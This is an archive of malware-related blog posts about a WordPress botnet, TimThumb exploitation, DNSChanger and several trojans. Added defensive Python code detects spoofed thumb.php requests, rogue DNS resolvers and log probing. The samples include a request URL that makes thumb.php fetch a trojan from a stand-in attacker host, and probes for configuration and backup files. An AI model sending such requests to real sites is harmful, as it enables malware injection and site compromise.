Category Archives: Malware

Malware, Trojans, Virus, Internet Security

Massive Number Websites in Botnet


Massive Number of Hacked USA Websites Participate in WordPress Botnet Attack

For the past couple of days we’ve been watching a customer’s WordPress site being attacked by a botnet of compromised websites trying to log in to the site’s admin area with the username “admin” and a variety of simple passwords.

Most of these attacks are coming from US-based web hosting services. One particular top-level service provider, Provo Unified Layer, stands out above the rest as the network with the most compromised hosts. Many second-tier providers, including Bluehost and Hostmonster, use Provo Unified Layer infrastructure. Of the hosts using Provo Unified Layer infrastructure, Bluehost is ahead of the pack in having hosted sites participating in the botnet.

Microsoft Security Essentials

Microsoft Security Essentials Under Microscope

A look at Microsoft Security Essentials, the free anti-virus application from Microsoft. Is Microsoft Security Essentials any good? Will it protect a Windows PC from the most common threats? Can MSE compete with commercial security applications?

I have become increasingly annoyed with commercial anti-virus applications. They have become overpriced, use too many system resources, interfere with other applications, or slow down internet access. Worse still, none of them detects every virus or piece of malware.

Installing Microsoft Security Essentials was easy. The basic installer downloaded fast and ran without any conflicts (on Windows XP 32-bit and Windows 7 (Enterprise Developers) 64-bit). A few options were offered.


Picasa Spoofed for Malware Injection

Hackers Using Picasa Spoof for Web Malware

Strange-looking referer URLs and GET requests that appear to come from Picasa are being used by hackers to find website vulnerabilities and inject malware or spam. Examining the details of the referer reveals something like this example: /wp-content/themes/biznizz/thumb.php?src=***** (stars replace the actual characters in the string for your safety – it leads nowhere). This particular example will inject malware using the WordPress TimThumb exploit: thumb.php is the TimThumb image-resizing script bundled with many themes, and its src parameter tells it which file to fetch, including files on remote hosts. The file 2.php contains a trojan horse!

Any query string repeating www. is suspicious, although it may have been a user error – often caused by copying and pasting a link without fully overwriting the existing address – but then at least the first www reference will normally be your blog or website (or a page on it). If a search engine has indexed something like this, resulting in a broken link to your site, whoever posted the link probably made a mistake, and it should be redirected to a suitable page…
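Why a “Picasa” address gets a theme’s thumb.php to fetch an attacker’s file, and how to pick such requests out of a log, is easier to see in code. The following is an added example written for this page; it is not TimThumb’s own PHP and not code from the original post. It is a Python rendering of the remote-source allow list in TimThumb 1.x: the script accepted a remote src whenever the hostname merely contained an allow-listed name (a PHP strpos check), so a host like picasa.com.attacker.example passed as picasa.com and whatever lived there was fetched and cached on the site. The hardened check beside it requires an exact match or a real sub-domain. The attacker hostnames and paths are constructed for the example; 2.php is the filename quoted above.

```python
"""Added example: TimThumb 1.x style allow-list check (vulnerable) beside a
hardened one, plus a classifier for thumb.php request URLs.  Not TimThumb's
code; hostnames such as attacker.example are constructed for the example."""
from urllib.parse import parse_qs, urlsplit

# TimThumb 1.x shipped an allow list of image hosts along these lines.
ALLOWED_SITES = ["flickr.com", "picasa.com", "blogger.com", "wordpress.com",
                 "img.youtube.com", "upload.wikimedia.org"]


def vulnerable_host_allowed(host):
    """Substring match, as TimThumb 1.x did: any host containing an allowed name passes."""
    host = host.lower()
    return any(site in host for site in ALLOWED_SITES)


def hardened_host_allowed(host):
    """Exact match or a genuine sub-domain of an allowed site (dot boundary enforced)."""
    host = host.lower().rstrip(".")
    return any(host == site or host.endswith("." + site) for site in ALLOWED_SITES)


def thumb_src_host(request_path):
    """Hostname named in thumb.php?src=..., or None when the request is not a remote fetch."""
    parts = urlsplit(request_path)
    if not parts.path.endswith("thumb.php"):
        return None
    src = parse_qs(parts.query).get("src", [""])[0]
    if not src.lower().startswith(("http://", "https://")):
        return None  # a path on the local site, not a remote fetch
    return urlsplit(src).hostname or ""


def classify_request(request_path):
    """'local', 'allowed', 'spoofed' (passes only the vulnerable check) or 'external'."""
    host = thumb_src_host(request_path)
    if host is None:
        return "local"
    if hardened_host_allowed(host):
        return "allowed"
    if vulnerable_host_allowed(host):
        return "spoofed"
    return "external"


def repeated_www(url):
    """The post's rule of thumb: a URL whose query string repeats 'www.' deserves a look."""
    return url.lower().count("www.") >= 2


if __name__ == "__main__":
    for req in (
        "/wp-content/themes/biznizz/thumb.php?src=http://www.picasa.com.attacker.example/2.php",
        "/wp-content/themes/biznizz/thumb.php?src=http://picasa.com/album/photo.jpg",
        "/wp-content/themes/biznizz/thumb.php?src=/wp-content/uploads/photo.jpg",
    ):
        print(classify_request(req), req)
```

A request classified as “spoofed” is exactly the pattern described above: it passes the old substring check and fails the hardened one. The real fix for a site is to update TimThumb (later versions tightened the host check and disabled remote fetching by default), not to filter logs, but the classifier is useful for finding which themes on a server were hit.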


Soccer Trojan from South Africa

Home Grown Malware?

Satellite image of South Africa (image from Wikipedia)

It looks like the Trojan tvwjfm.exe (known under several other names too – see the list of known names and further information) could have originated from South Africa. At least the first reported infections came from this locale.

This makes a change to the norm where the largest percentage of new malware hails from the Asian Sub-Continent, although a tie-in to this region cannot be excluded.

This Trojan has not had a big impact; outbreaks so far seem to be limited, possibly deliberately targeting specific users. However, the few reported instances should not be taken to imply this Trojan is not dangerous – it is.

The file is unusually large for a Trojan, containing a package of other files. If run, it behaves like an application installer. Even if the install is cancelled, the Trojan installs other malware unknown to the PC user.

Soccer Trojan

I have decided to unofficially name this Trojan (as yet it has no official name) the Soccer Trojan. It presents itself with an icon of a soccer ball superimposed over a PC display, similar to the image on the left, which is clearly an attempt to encourage followers of this ball game to run the file.

Hopefully the Soccer Trojan will remain obscure, and not spread. Our vigilance is required at this early stage to interdict the malware before it gets the opportunity to ‘go viral’ and escape into the wild.

Rove Digital Botnet Take-Down

Cyber-Criminals Arrested, US Offices Closed

A cyber criminal network operated by Estonian company Rove Digital was taken down on November 8 2011 in a combined effort involving the FBI (Federal Bureau of Investigation of the USA) and the Estonian Police in co-operation with Trend Micro.

Rove Digital operated a botnet consisting of over four million (4 000 000) bots: computers infected with a class of malware known as ‘DNSChangers’. The infected systems typically have their DNS (Domain Name System) resolver settings changed to point to foreign IP addresses under the criminals’ control, so that every name lookup the victim makes is answered by a server the operators run.

On the surface Rove Digital appeared to be a legitimate business, with established offices in Tartu, Estonia. It was the parent company of several other operations, including Esthost, Estdomains, Cernel, UkrTelegroup and many less well-known shell companies.

Rove Digital used a variety of criminal methods to earn money from the DNS changers. The cyber-crime network had operated since 2006.
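The practical question for a reader of this post is whether their own machine is one of the four million. Because DNSChanger works by rewriting the resolver addresses, the check is to read those addresses back and compare them with the rogue ranges. The script below is an added example, not code from the original post or from the take-down operation; it parses the resolver settings from a Unix/Mac /etc/resolv.conf and from Windows ‘ipconfig /all’ output and flags any address inside the ranges the FBI published for Operation Ghost Click. The ranges are reproduced from that advisory and should be confirmed against it before being relied on; the resolv.conf and ipconfig text are constructed samples.

```python
"""Added example: detect DNSChanger-style rogue resolvers.  The CIDR ranges
are the FBI's published Operation Ghost Click rogue DNS ranges (verify against
the advisory); the sample configuration text is constructed for the example."""
import ipaddress
import re

ROGUE_DNS_RANGES = [ipaddress.ip_network(cidr) for cidr in (
    "85.255.112.0/20",   # 85.255.112.0 - 85.255.127.255
    "67.210.0.0/20",     # 67.210.0.0   - 67.210.15.255
    "93.188.160.0/21",   # 93.188.160.0 - 93.188.167.255
    "77.67.83.0/24",     # 77.67.83.0   - 77.67.83.255
    "213.109.64.0/20",   # 213.109.64.0 - 213.109.79.255
    "64.28.176.0/20",    # 64.28.176.0  - 64.28.191.255
)]

IPV4 = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})")


def resolvers_from_resolv_conf(text):
    """Nameserver addresses from a Unix/Mac /etc/resolv.conf."""
    found = []
    for line in text.splitlines():
        m = re.match(r"\s*nameserver\s+(\S+)", line)
        if m:
            found.append(m.group(1))
    return found


def resolvers_from_ipconfig(text):
    """DNS server addresses from Windows 'ipconfig /all': the address on the
    'DNS Servers' line plus continuation lines that hold only an address."""
    found, collecting = [], False
    for line in text.splitlines():
        if "DNS Servers" in line:
            collecting = True
            m = IPV4.search(line.partition(":")[2])
            if m:
                found.append(m.group(1))
            continue
        if collecting:
            m = IPV4.fullmatch(line.strip())
            if m:
                found.append(m.group(1))
                continue
            collecting = False
    return found


def check_resolvers(addresses):
    """Map each resolver address to the rogue network it falls in, or None."""
    verdicts = {}
    for addr in addresses:
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            verdicts[addr] = None  # not an IP literal; nothing to compare
            continue
        hit = next((net for net in ROGUE_DNS_RANGES if ip in net), None)
        verdicts[addr] = str(hit) if hit else None
    return verdicts


def uses_rogue_dns(addresses):
    """True if any configured resolver sits inside a rogue range."""
    return any(check_resolvers(addresses).values())


# Constructed samples: a Mac whose resolver was rewritten, and a clean Windows PC.
RESOLV_CONF_SAMPLE = """# constructed sample
nameserver 85.255.112.36
nameserver 192.168.1.1
"""

IPCONFIG_SAMPLE = """   (constructed sample)
   Default Gateway . . . . . . . . . : 192.168.0.1
   DNS Servers . . . . . . . . . . . : 192.168.0.1
                                       192.0.2.53
   NetBIOS over Tcpip. . . . . . . . : Enabled
"""

if __name__ == "__main__":
    print("resolv.conf:", check_resolvers(resolvers_from_resolv_conf(RESOLV_CONF_SAMPLE)))
    print("ipconfig:   ", check_resolvers(resolvers_from_ipconfig(IPCONFIG_SAMPLE)))
```

One caveat worth knowing: DNSChanger also changed the DNS setting on some home routers, so a PC whose own configuration looks clean may still be handed a rogue resolver by the router. Checking the address the router reports as its upstream DNS, not just the PC’s, closes that gap.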

Operation Ghost Click


Website Hacking Attack

Hacking Attempt from IP

An unsuccessful attempt to hack my website was made on Friday 21 October 2011 shortly before 15h00 SAST (13h00 GMT).

Satellite image of the attacker’s location in Dubai (image from Google Earth)

The attempt was first identified by repeated 404 ‘page not found’ and 403 ‘access forbidden’ responses, caused by the attacker requesting URLs in an attempt to reach the server and website setup files and to log in to unauthorised, prohibited areas of the website and server. The server is set to notify me of 404, 403 and similar errors.

The attack originated from a business on the corner of Jumeirah Road and Sheikh Rashid Road, Jumeirah, Dubai, United Arab Emirates; the business is located in a warehouse or freight depot. This was identified by geolocating the IP addresses used during the attack. It appears two hackers were working simultaneously. Bear in mind that IP geolocation is approximate and points at the network that holds the address, not necessarily at the person at the keyboard; a hosting, proxy or compromised address in particular can be far from the actual operator.

I should thank these ill intended persons for testing the security of the website and server. Each incident is an opportunity to examine security, to improve the strength of the server environment.
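Both attacks on this page leave a clear trace in the web server’s access log, and the notification approach described above scales poorly once the probing is constant. The script below is an added example, not code from either original post: it parses Apache combined-format lines and runs two detectors. The first is for the distributed password guessing against wp-login.php described in “Massive Number of Hacked USA Websites Participate in WordPress Botnet Attack” above, where many source addresses each make only a few attempts, so a per-address threshold never trips and the signal is the number of distinct addresses hitting the login form in one window. The second is for the probing behind the 403/404 notifications in this post, where one address requests many paths that do not exist or are forbidden. All log lines, addresses and paths are constructed samples; the thresholds are parameters to tune for a real site. WordPress answers a failed login with 200 (the form again), so attempts are counted by POST, not by status code.

```python
"""Added example: two access-log detectors (distributed login guessing and
path probing).  The log lines, addresses and paths are constructed samples."""
import re
from collections import defaultdict
from datetime import datetime, timezone

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')


def parse_line(line):
    """One combined-format line -> dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def parse_log(text):
    return [rec for rec in map(parse_line, text.splitlines()) if rec]


def login_guessing(records, window_s=600, per_ip=10, distinct_ips=5):
    """Flag wp-login.php POST activity per time window.  Returns a list of
    (window_start_iso, kind, sorted_ips): 'single-source' when one address
    made at least per_ip attempts, 'distributed' when at least distinct_ips
    different addresses posted to the login form in the same window."""
    windows = defaultdict(lambda: defaultdict(int))  # window start -> ip -> attempts
    for rec in records:
        if rec["method"] == "POST" and rec["path"].split("?")[0].endswith("/wp-login.php"):
            start = int(rec["time"].timestamp()) // window_s * window_s
            windows[start][rec["ip"]] += 1
    findings = []
    for start, attempts in sorted(windows.items()):
        label = datetime.fromtimestamp(start, timezone.utc).isoformat()
        noisy = sorted(ip for ip, n in attempts.items() if n >= per_ip)
        if noisy:
            findings.append((label, "single-source", noisy))
        if len(attempts) >= distinct_ips:  # the botnet case: many IPs, few tries each
            findings.append((label, "distributed", sorted(attempts)))
    return findings


def path_probing(records, min_paths=5):
    """Addresses that drew 403/404 responses on at least min_paths distinct paths."""
    errors = defaultdict(set)
    for rec in records:
        if rec["status"] in (403, 404):
            errors[rec["ip"]].add(rec["path"])
    return {ip: sorted(paths) for ip, paths in errors.items() if len(paths) >= min_paths}


# Constructed sample log: five botnet members posting to the login form, one
# legitimate visitor, and one address probing for setup and backup files.
SAMPLE_LOG = """\
198.51.100.11 - - [21/Oct/2011:14:50:01 +0200] "POST /wp-login.php HTTP/1.1" 200 3927 "-" "Mozilla/5.0"
198.51.100.12 - - [21/Oct/2011:14:50:03 +0200] "POST /wp-login.php HTTP/1.1" 200 3927 "-" "Mozilla/5.0"
198.51.100.13 - - [21/Oct/2011:14:50:04 +0200] "POST /wp-login.php HTTP/1.1" 200 3927 "-" "Mozilla/5.0"
198.51.100.14 - - [21/Oct/2011:14:50:06 +0200] "POST /wp-login.php HTTP/1.1" 200 3927 "-" "Mozilla/5.0"
198.51.100.15 - - [21/Oct/2011:14:50:09 +0200] "POST /wp-login.php HTTP/1.1" 200 3927 "-" "Mozilla/5.0"
198.51.100.11 - - [21/Oct/2011:14:51:30 +0200] "POST /wp-login.php HTTP/1.1" 200 3927 "-" "Mozilla/5.0"
192.0.2.10 - - [21/Oct/2011:14:52:00 +0200] "GET /about/ HTTP/1.1" 200 8120 "http://www.example-blog.test/" "Mozilla/5.0"
203.0.113.7 - - [21/Oct/2011:14:57:10 +0200] "GET /wp-config.php.bak HTTP/1.1" 404 512 "-" "-"
203.0.113.7 - - [21/Oct/2011:14:57:11 +0200] "GET /phpmyadmin/ HTTP/1.1" 404 512 "-" "-"
203.0.113.7 - - [21/Oct/2011:14:57:12 +0200] "GET /admin/ HTTP/1.1" 403 498 "-" "-"
203.0.113.7 - - [21/Oct/2011:14:57:13 +0200] "GET /.htaccess HTTP/1.1" 403 498 "-" "-"
203.0.113.7 - - [21/Oct/2011:14:57:15 +0200] "GET /backup.sql HTTP/1.1" 404 512 "-" "-"
192.0.2.10 - - [21/Oct/2011:14:58:00 +0200] "GET /missing-page/ HTTP/1.1" 404 512 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for finding in login_guessing(recs):
        print("login:", *finding)
    for ip, paths in path_probing(recs).items():
        print("probing:", ip, paths)
```

With the defaults, the five botnet addresses are reported as one “distributed” finding even though no single one of them exceeds the per-address limit, and the probing address is reported with the list of paths it tried; the visitor who hit one missing page is not. Blocking on the per-address detector alone would miss the first case entirely, which is the point of the botnet post above.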


Trojan Generic24 Family

Article about Trojan Horse Generic24.cgol

The previous article posted on this blog about Generic 24 Trojans elicited a lot of interest. Even more interest was shown in my removal tips for the generic24.cgol variant, posted on my website.

I thought now would be a good time to post an update. The .cgol variety seems to have died down somewhat; however, it seems that every day a new version is detected. Recent references I found include:

  • Generic24.CJGK (also written generic24.cjgk, 20 Sept 2011)
  • Generic24.BRQA
  • Generic24.BRQD
  • Generic24.BRQF, etc. (full list at AVG)
  • Generic24.TSU (21 Sept 2011)
  • Generic24.BUOM
  • Generic24.BVUA (22 Sept 2011)
  • Generic24.PNT (12 Sept 2011)
  • Generic24.CPQJ (23 Sept 2011)
  • Generic24.AAWJ (12 Sept 2011)
  • Generic24.CAVY (21 Sept 2011)
  • Generic24.BIVS (2 Sept 2011)
  • Generic24.FLZ (5 Oct 2011)
  • Generic24.PYB (1 Oct 2011)
  • Generic24.ATJW (3 Sept 2011)
  • Generic24.WMQ (24 Sept 2011)

The list goes on; these are from recent forums and other articles found via a search engine, from Sept this year.

There are literally thousands of similar trojans with ‘Generic’ in the name. Bear in mind that ‘Generic’ here is the anti-virus vendor’s label for a heuristic or generic signature match rather than a named malware family, so two Generic24 detections need not be related to each other at all.

One common factor is that they are generally classed as hacking malware: they open a back door through which other malware that captures personal information from the infected PC can be installed.

Again I stress the importance of early intervention should one of these trojans infect your PC.

The removal tips at the above web address can be used to fix most early infections by looking for HKEY registry references similar to those mentioned there for Firefox.

Apple Mac Not Immune to Malware

Apple Macs do get Malware

How often do we still hear Mac users blithely proclaiming that they have no need for anti-virus software because Macs don’t get viruses? Well, Mac users, those days are gone for good, if they ever existed at all.

The fact that what some regard as the world’s first virus, “Elk Cloner”, spread on Apple computers (it was written for the Apple II, a couple of years before the Macintosh existed) seems to have exited people’s minds.

The hardening of the Unix core of Mac OS X perhaps makes it more difficult for malicious persons to write viruses and trojans for Macs. Also, in the old days Mac users were a very small group of computer users, mainly professionals in the print and graphics industries, not a big enough target for virus creators to spend their time on.

Mac users have been complacent, secure in the expectation that their systems are safe; at one time I was one of them. I used Macs for years with no AV software installed.

Recent Mac Viruses

Only a few months ago, the Mac Defender trojan horse was happily infecting Macs around the world, and just today an article from Sophos Naked Security highlights another Mac trojan, OSX/Revir-B.

These Mac Trojans are not however the end of the story. Consider all the file sharing between Mac and Windows users in the commercial world.

Macs can pass on Windows malware

How often do files get transferred from Mac to Windows platforms? How often do vulnerable removable drives get used to transfer these files?

Here is an example:
User A prepares work on a Mac. User A has no Anti Virus software because Macs are immune! Unknown to user A, a visit to a website has installed a Windows virus or trojan in a Word or Excel file. User A sends the file to user B, a Windows user. User B’s PC gets infected!

Or another example;
User A gets an e-mail containing malware and forwards it to User B. Once again User B’s PC gets infected.

Mac Users, break the malware chain, get your Macs protected. The days of Mac immunity to malware are gone for ever.